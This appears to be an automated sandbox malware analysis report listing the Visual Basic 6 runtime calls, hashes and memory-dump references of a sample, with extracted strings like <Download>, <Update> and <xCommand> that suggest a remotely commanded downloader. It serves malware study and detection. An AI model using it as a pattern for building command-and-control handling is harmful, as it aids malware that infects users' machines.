                                                                                                                                                            • Opcode ID: f54afba412deddb39359729a71a6808b361c1be6de5175c45cca3d60e2a50ae1
                                                                                                                                                            • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                                                                            • Opcode Fuzzy Hash: f54afba412deddb39359729a71a6808b361c1be6de5175c45cca3d60e2a50ae1
                                                                                                                                                            • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 004156CA
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                              • Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                              • Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                              • Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                              • Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                              • Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                              • Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
                                                                                                                                                            • #580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
                                                                                                                                                            • #598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,?,?,00000020), ref: 00411EDE
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,?,00000000,004025E6), ref: 00411F2C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411F72
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411F81
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004123A0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                            • String ID: 5
                                                                                                                                                            • API String ID: 3012955283-2226203566
                                                                                                                                                            • Opcode ID: 0b24e6c4bda827c6a114c5c5ec940fd24b323a20a7d7f84330a0b150b4d800ed
                                                                                                                                                            • Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
                                                                                                                                                            • Opcode Fuzzy Hash: 0b24e6c4bda827c6a114c5c5ec940fd24b323a20a7d7f84330a0b150b4d800ed
                                                                                                                                                            • Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                              • Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                              • Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                              • Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
                                                                                                                                                            • #712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
                                                                                                                                                            • #712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
                                                                                                                                                            • #712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F345
                                                                                                                                                            • #712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F371
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
                                                                                                                                                            • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                                                                            • API String ID: 3601514899-954089795
                                                                                                                                                            • Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                                                                            • Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00408DB5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408DCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408DFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408E16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408E46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408E5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                              • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                              • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                              • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00408ECE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408EE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F2F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F5F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F77
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                              • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                              • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                              • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                              • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00408FE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409000
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?), ref: 004104ED
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00409057
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409070
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 004090A0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 004090B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 004090E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409101
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409130
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409149
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,?), ref: 004091D2
                                                                                                                                                            • #580.MSVBVM60(?,00000027,?,?,0041B088,?), ref: 00409245
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,?,?), ref: 0040925D
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$Error$System$List$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrCheckConstruct2DestructGenerateHresultOverflowUnicode
                                                                                                                                                            • String ID: D
                                                                                                                                                            • API String ID: 2939130588-2746444292
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411206
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0041120A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411222
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411231
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411243
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411252
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411255
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0041128E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411299
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112A1
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411471
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041147A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041147E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411495
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004112DE
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004112C4
